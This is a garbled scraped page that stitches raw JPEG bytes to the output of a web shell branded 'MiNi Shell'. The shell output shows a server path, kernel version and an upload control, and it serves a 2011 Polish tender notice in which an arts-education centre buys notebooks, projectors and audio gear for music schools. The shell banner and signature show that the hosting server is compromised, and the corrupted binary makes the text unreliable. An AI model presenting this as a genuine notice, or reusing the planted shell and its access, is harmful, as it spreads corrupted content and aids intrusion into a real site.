JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111018/340574-N-2011.html

<p class="kh_header"><b>Warszawa: ZAKUP SPRZĘTU KOMPUTEROWEGO I ELEKTRONICZNEGO NA POTRZEBY PROWADZENIA ZAJĘĆ DODATKOWYCH W JEDNOSTKACH SZKOLNICTWA ARTYSTYCZNEGO W RAMACH REALIZACJI PROJEKTU PN. KAŻDE DZIECKO JEST INNE</b><br>
<b>Numer ogłoszenia: 340574 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Edukacji Artystycznej , ul. Brzozowa 35, 00-258 Warszawa, woj. mazowieckie, tel. 022 42 10 621, faks 022 42 10 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cea.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP SPRZĘTU KOMPUTEROWEGO I ELEKTRONICZNEGO NA POTRZEBY PROWADZENIA ZAJĘĆ DODATKOWYCH W JEDNOSTKACH SZKOLNICTWA ARTYSTYCZNEGO W RAMACH REALIZACJI PROJEKTU PN. KAŻDE DZIECKO JEST INNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprzedaż oraz dostawa transportem własnym do siedziby Zamawiającego (Warszawa, ul. Brzozowa 35) sprzętu i oprogramowania komputerowego, peryferyjnego oraz sprzętu elektronicznego wraz z akcesoriami. Zakupiony sprzęt będzie wykorzystywany w trakcie prowadzenia zajęć dodatkowych w jednostkach szkolnictwa artystycznego (szkołach artystycznych) rozlokowanych na terenie całego kraju. Zajęcia dodatkowe będą prowadzone w ramach realizacji unijnego projektu systemowego pn. Każde dziecko jest inne, współfinansowanego z Programu Operacyjnego Kapitał Ludzki - działanie 3.3. Poprawa jakości kształcenia. Wykaz jednostek szkolnictwa artystycznego, w których będą prowadzone zajęcia dodatkowe oraz będzie przez nie użytkowany zakupiony sprzęt zawiera punkt 2. Zamawiający dopuszcza możliwość składania ofert częściowych według wskazanego w punkcie 3 podziału na części.
2. Wykaz szkół artystycznych, w których będą prowadzone zajęcia dodatkowe wraz z adresami miejsc, w których będzie realizowany przedmiot zamówienia: 
a. Państwowy Zespół Szkół Muzycznych im. Artura Rubinsteina w Bydgoszczy - ul. Andrzeja Szwalbego 1,
b. Zespół Szkól Muzycznych im. Stanisława Moniuszki w Wałbrzychu - ul. Piętnastolecia 24,
c. Zespół Państwowych Szkół Muzycznych im. F. Nowowiejskiego w Gnieźnie - ul. Mieszka I nr 20,
d. Zespół Państwowych Szkól Muzycznych w Katowicach - ul. Ułańska 7b,
e. Zespół Szkół Muzycznych im. I. J. Paderewskiego w Krośnie - ul. Paderewskiego 7, 
f. Zespół Państwowych Szkól Muzycznych im. Artura Malawskiego w Przemyślu 
- ul. Słowackiego 91,
g. Zespól Państwowych Szkól Muzycznych im. Kazimierza Wiłkomirskiego w Elblągu 
- ul. Traugutta 91,
h. Zespół Państwowych Szkół Muzycznych nr 1 w Warszawie - ul. Miodowa 22 CD,
i. Ogólnokształcąca Szkoła Muzyczna I stopnia w Piszu - ul. Jagodna 4,
j. Ogólnokształcąca Szkoła Muzyczna I i II stopnia im. Feliksa Nowowiejskiego w Gdańsku - ul. Gnilna 3,
k. Ogólnokształcąca Szkoła Muzyczna I i II stopnia im. Karola Lipińskiego w Lublinie 
- ul. Muzyczna 10,
l. Zespół Państwowych Szkól Muzycznych nr 4 im. Karola Szymanowskiego w Warszawie  - ul. Krasińskiego 1,
m. Ogólnokształcąca Szkoła Muzyczna I i II stopnia im. Fryderyka Chopina w Bytomiu - ul. Moniuszki 17, 
n. Państwowa Ogólnokształcąca Szkoła Artystyczna w Zakopanem - ul. Sienkiewicza 12,
o. Zespół Państwowych Szkół Muzycznych im. Grażyny Bacewicz w Koszalinie - ul. Fałata 32,
p. Zespół Szkół Muzycznych im. Stanisława Moniuszki w Łodzi - ul. Rojna 20.
3. Przedmiot zamówienia obejmuje sprzedaż i dostawę n/w produktów: 
3.1. Część I:
a) Notebook - 20 szt.
b) Urządzenie wielofunkcyjne (drukarka, skaner, kopiarka) - 5 szt.
c) Zestaw głośników do komputera - 2 szt.
3.2. Część II:
a) Projektor - 2 szt.
b) Zestaw: tablica interaktywna + rzutnik - 2 kpl. 
3.3. Część III: 
a) Kamera cyfrowa - 2 szt.
3.4. Część IV:
a) Radiomagnetofon przenośny - 3 szt.
b) Miniwieża - 1 szt.
3.5. Część V:
a) Zestaw mikrofonów bezprzewodowych - 1 szt.
b) Mikrofon - 2 szt.
c) Zestaw nagłaśniający - 1 szt.
Szczegółowy opis przedmiotu zamówienia został zawarty w punkcie 4. 
4. Szczegółowy opis przedmiotu zamówienia:
4.1. Część I:
a) Notebook - o parametrach zgodnych lub wyższych z modelem Asus K53E-SX089V lub równoważny:
- Procesor - Intel i3 2310M lub równoważny
- RAM - minimum 2GB DDR3
- Ekran - przekątna 15,6 cala
- Nagrywarka DVD
- Pojemność dysku twardego - minimum 640 GB
- Minimum 3 złącza USB
- Wejście i wyjście audio
- Klawiatura z wydzielonym blokiem numerycznym
- System operacyjny - Windows 7 PL
- Torba + zasilacz + mysz w zestawie
b) Urządzenie wielofunkcyjne (drukarka, skaner, kopiarka):
- Druk laserowy monochromatyczny
- Rozmiar A4
- Skaner
- Funkcja kopiarki
- Obsługa pamięci USB
- Sterowniki do systemu operacyjnego Windows XP/Vista/7
c) Zestaw głośników do komputera o parametrach zgodnych lub wyższych z modelem CreativeInspire T3130 lub równoważny:
- 2 głośniki wysokotonowe i subwoofer (2.1)
- Zakres przenoszenia 40-20 000 Hz
- Moc 5 W (głośniki) 15 W (subwoofer)
- Regulacja głośności
4.2. Część II:
a) Projektor o parametrach zgodnych lub wyższych z modelem BenQ MX511 lub równoważny:
- Technologia DLP
- Rozdzielczość 1024 x 768
- Obsługiwane proporcje obrazu 4:3, 16:9
- Kontrast 3000:1
- Jasność 2700 ANSI lumenów
- Moc lampy 190 W
- Złącza 3 D-sub, HDMI
- Żywotność lampy - minimum 4000 h
- Głośniki - 2 W
b) Zestaw: tablica interaktywna + rzutnik o parametrach zgodnych lub wyższych z modelami: tablica interaktywna InterwriteDualBoard 1279, projektorBenQ MX810 ST lub równoważne:
- Tablica:
- Technologia - elektromagnetyczna pasywna
- Powierzchnia tablicy twarda, przeznaczona do projekcji i rysowania 
- Rozdzielczość sprzętowa rozdzielczość wewnętrzna: 4096 punktów (linii) na cal
- Rozdzielczość wyjściowa: 1000 linii na cal (39,4 linii na mm)
- Przekątna minimum 78 cali
- Komunikacja z komputerem przez USB
- Sterowniki i oprogramowanie kompatybilne z systemem Windows 7 w języku polskim
- Piórka interaktywne + ładowarka
- Pisaki elektroniczne z markerem
- Okablowanie
- Rzutnik:
- Technologia DLP
- Rozdzielczość 1024 x 768
- Obsługiwane proporcje obrazu 4:3, 16:9
- Kontrast 3000:1
- Jasność 2700 ANSI lumenów
- Moc lampy 190 W
- Złącza 3 D-sub, HDMI
- Żywotność lampy - minimum 4000 h
- Głośniki - 2 W
- Uchwyt mocujący
4.3. Część III: 
a) Kamera cyfrowa o parametrach zgodnych lub wyższych z modelem Sony HDR-XR155 lub równoważny:
- Format HD 1920x1080
- Zapis na dysku HDD o pojemności 120 GB
- Mikrofon wbudowany (kierunkowy)
- Zbliżenie optyczne 25
- Panel dotykowy
- Matryca ExmorCMOS lub równoważny
- Torba
4.4. Część IV:
a) Radiomagnetofon przenośny o parametrach zgodnych lub wyższych z modelem modelem Philips AZ 1837 lub równoważny:
- Odtwarzacz płyt CD
- Odtwarzanie plików w formacie mp3
- Możliwość odtwarzania muzyki z nośnika pamięci USB
- Tuner radiowy
- Zasilanie sieciowe i na baterie
b) Miniwieża 
- Odtwarzacz płyt CD
- Odtwarzanie plików w formacie mp3
- Możliwość odtwarzania muzyki z nośnika pamięci USB
- 2 głośniki o mocy 10W
- Tuner radiowy
- Pilot
4.5. Część V:
a) Zestaw mikrofonów bezprzewodowych o parametrach zgodnych lub wyższych z modelem AKG WMS PRO Dual Prezenter lub równoważny:
- Odbiornik SR 40 PRO DUAL: Dwuantenowy - jedna antena na kanał 
- Fabrycznie ustawiona częstotliwość 
- Nadajnik HT 40 PRO (z uchwytem)
- Modulacja: FM 
- Zasilanie: 1 x 1,5V baterie rozmiar AA
- Czas życia baterii : 35 godzin (suche baterie) 
- Nadajnik PT 40 PRO (z uchwytem)
- Modulacja: FM 
- Zasilanie: 1 x 1,5V baterie rozmiar AA 
- Czas życia baterii : 30 godzin (suche baterie) 
- Waga net.: 60g 
- Akcesoria: kabel MKG L 
- Mikrofon zakładany na głowę C-444 
- Zakres częstotliwości akustycznych : 20Hz do 20,000Hz 
- Typ złącza : 3-pinowy mini-XLR 
- Modulacja: FM 
b) Mikrofon o parametrach zgodnych lub wyższych z modelem AKG C1000S lub równoważny:
- Zasilanie 9V z baterii lub od 9V do 52 V napięcie phantomowe
- Przełączane charakterystyki kierunkowe - kardioidalna i hiperkardioidalna. 
- Przystawka PB 1000 - filtr prezencyjny
c) Zestaw nagłaśniający o parametrach zgodnych lub wyższych z modelem Yamaha StagePass300 lub równoważny:
 - 8-kanałowy (4 mono i 2 stereo) powermikser, usuwalny z obudowy jednego z głośników, możliwość montażu uchwytu na statyw mikrofonowy
- Wzmacniacze klasy D 2 x 150W
- 2-pasmowy EQ
- Efekt (Kanały 1-4)
- Wyjście monitorowe
- Dwa pasywne głośniki w obudowie (1 wysokotonowy oraz 8 basowy)
5. Kody Wspólnego Słownika Zamówień CPV: 
- 30.19.50.00-2 - Tablice
- 30.21.31.00-6 - Komputery przenośne
- 30.23.21.10-8 - Drukarki laserowe
- 32.34.23.00-5 - Mikrofony i zestawy głośnikowe
- 32.34.24.12-3 - Głośniki
- 32.34.42.60-6 - Sprzęt radiowy i multipleksy
- 38.65.16.00-9 - Kamery cyfrowe
- 38.65.21.00-1 - Projektory
6. Oferowany sprzęt i wyposażenie komputerowe oraz sprzęt elektroniczny wraz z akcesoriami muszą być zgodne z certyfikatem CE.
7. Zamawiający oświadcza, że zakupiony w pkt. 3 przedmiot zamówienia będzie wykorzystywany do celów dydaktyczno - oświatowych polegających na prowadzeniu zajęć dydaktycznych w siedzibie i poza siedzibą Zamawiającego na terytorium Rzeczypospolitej Polskiej. Stawki podatku VAT stosuje się odpowiednio.
8. Wymagany termin realizacji przedmiotu zamówienia: do 21 dni kalendarzowych od daty podpisania umowy
9. Wykonawca zobowiązany jest udzielić Zamawiającemu dla oferowanych elementów przedmiotu zamówienia standartowo minimum 24 miesięcznego okresu gwarancji od daty dostawy i sporządzenia protokołu zdawczo - odbiorczego. Dla n/w sprzętu Wykonawca zobowiązany jest udzielić minimum:
a. Tablica multimedialna - 36 miesięcznego okresu gwarancji (elektronika i powierzchnia tablicy) oraz 1 rok na akcesoria,
od daty dostawy i sporządzenia protokołu zdawczo - odbiorczego.
10. W okresie gwarancji, Wykonawca zgodnie z wymaganiami Zamawiającego, zobowiązany będzie, w przypadku wystąpienia usterki jakiegokolwiek elementu przedmiotu zamówienia do naprawy sprzętu w terminie 72 godzin od zgłoszenia usterki z obowiązkiem dostawy sprzętu lub wyposażenia zastępczego Zamawiającemu albo wymiany danego elementu na nowy.
11. W przypadkach, o których mowa w punkcie 10, okres gwarancji ulegnie przedłużeniu odpowiednio:
1) w przypadku naprawy - o okres wykonywania naprawy,
2) w przypadku dokonania wymiany - o okres gwarancji.
12. Warunki finansowe rozliczeń:
a) podstawą wystawienia faktury będzie obustronnie podpisany protokół zdawczo - odbiorczy, potwierdzający zrealizowanie danego zakresu przedmiotu umowy,
b) wynagrodzenia płatne będzie przelewem w terminie 21 dni od daty otrzymania oryginału faktury,
c) podane w ofercie wynagrodzenie ryczałtowe jest stałe i nie podlega waloryzacji w trakcie obowiązywania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.19.50.00-2, 30.23.21.10-8, 32.34.23.00-5, 32.34.24.12-3, 32.34.42.60-6, 38.65.16.00-9, 38.65.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma obowiązku wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia 
Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia oraz złożenie wykazu zrealizowanych minimum 2 podobnych zamówień, tj. dostawy sprzętu komputerowego i/lub elektronicznego o wartości każdego z zamówień równej wartości składanej oferty w danej części przedmiotu zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
warunek ten należy rozumieć w następujący sposób:
a) jeżeli wykonawca składa ofertę tylko na jedną wybraną część przedmiotu zamówienia - zobowiązany jest udowodnić iż posiada doświadczenie zawodowe równe wartości oferty składanej w tej konkretnej części,
b) jeżeli wykonawca składa ofertę na więcej niż jedną część przedmiotu zamówienia - zobowiązany będzie do wykazania posiadanego doświadczenia zawodowego w postaci zrealizowania minimum dwóch zamówień, których każdego wartość będzie co najmniej równa sumie wartości składanej oferty w danych częściach przedmiotu zamówienia
Ocena spełniania warunku nastąpi w oparciu o złożone w ofercie dokumenty, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia.
Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia.
Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia.
Ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cea.art.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. Brzozowa 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2011 godzina 10:00, miejsce: Warszawa, ul. Brzozowa 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków Unii Europejskiej z Programu Operacyjnego Kapitał Ludzki - działanie 3.3. Poprawa jakości kształcenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com